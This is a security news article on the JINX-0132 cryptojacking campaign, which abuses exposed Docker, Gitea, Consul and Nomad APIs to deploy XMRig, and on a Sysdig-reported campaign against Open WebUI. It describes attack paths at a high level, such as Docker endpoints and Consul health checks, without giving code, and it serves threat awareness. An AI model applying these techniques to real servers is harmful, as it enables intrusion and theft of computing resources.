Cryptojacking Campaign Leverages Open-Source Tools from GitHub to Exploit DevOps APIs

Cybersecurity researchers have identified a new cryptojacking campaign targeting publicly accessible DevOps web servers associated with technologies such as Docker, Gitea, and HashiCorp Consul and Nomad, with the intention of illicitly mining cryptocurrencies. The cloud security firm Wiz has been tracking this activity under the label JINX-0132, highlighting that attackers are exploiting various known misconfigurations and vulnerabilities to deploy miner payloads.

This campaign is notable as it represents one of the first documented cases of exploiting Nomad misconfigurations in the field. The researchers observed that attackers are sourcing the necessary tools directly from GitHub repositories, a strategy that aims to obscure attribution efforts by distancing themselves from their own infrastructure.

JINX-0132 has reportedly compromised Nomad instances managing hundreds of clients, leveraging their combined CPU and RAM resources, which can be costly to the hosts—potentially amounting to tens of thousands of dollars monthly. This highlights the considerable computational power utilized in the cryptojacking operations.

The exploitation of the Docker API remains a recognized launchpad for such activities. Recently, Kaspersky noted similar targeting of misconfigured Docker API instances to co-opt them into a cryptocurrency mining botnet. Exposed Docker API instances permit threat actors to execute malicious code by spinning up containers that either mount the host file system or initiate cryptocurrency images via standard Docker endpoints such as “/containers/create” and “/containers/{id}/start.”

Wiz indicated that the threat actors are leveraging vulnerabilities or misconfigurations within Gitea, an open-source solution for hosting Git repositories. Specifically, publicly exposed instances of Gitea can fall victim to remote code execution if the attacker gains access to a user with permissions to create git hooks, particularly if they are running version 1.4.0 or if the installation page is left unlocked.

In a similar vein, HashiCorp Consul may also facilitate arbitrary code execution if not properly secured, allowing any user with remote access to register services and define health checks that may include executable bash commands. JINX-0132 specifically exploits this capability by adding malicious checks to execute mining software, evidenced by the addition of multiple services with inconspicuous names aimed at downloading and running the XMRig payload.

Furthermore, JINX-0132 has been observed manipulating publicly exposed Nomad server APIs to create numerous jobs on compromised hosts, responsible for downloading and executing the XMRig miner payload from GitHub. The vulnerability stems from Nomad’s lack of secure default settings, which can lead to remote code execution capabilities on the server and its connected nodes.

Data from Shodan reveals over 5,300 exposed Consul servers and upwards of 400 exposed Nomad servers globally, with a significant concentration in regions such as China, the United States, Germany, Singapore, Finland, the Netherlands, and the United Kingdom.

Recent disclosures from Sysdig have also detailed a malware campaign targeting Linux and Windows environments through the exploitation of misconfigured systems running Open WebUI, allowing attackers to upload AI-generated Python scripts that deliver cryptocurrency miners. The exposure to the internet permits command execution on the system, a critical vulnerability that attackers are actively scanning for.

Once attackers identify exposed training systems, they exploit Open WebUI Tools, a plugin system leveraged to augment LLM capabilities, allowing malicious Python code execution. This script is crafted to download and run cryptocurrency miners while establishing persistence and utilizing a Discord webhook for command-and-control operations. Additionally, it incorporates defensive evasion tactics, deploying libraries to conceal mining activities on Linux systems.

For compromised Windows systems, the methodology is analogous but includes the installation of the Java Development Kit (JDK) to execute a downloaded JAR file that functions as a loader for secondary payloads. This attack culminates in the execution of files capable of stealing credentials from Discord and cryptocurrency wallet extensions in Google Chrome.

Sysdig’s analysis indicates more than 17,000 Open WebUI instances are accessible online, albeit it remains unclear how many possess actual misconfigurations or other security vulnerabilities. The researchers emphasize that unintentional misconfigurations exposing systems like Open WebUI to the internet pose a significant risk, particularly as attackers target both Linux and Windows environments employing sophisticated infostealers and evasion techniques.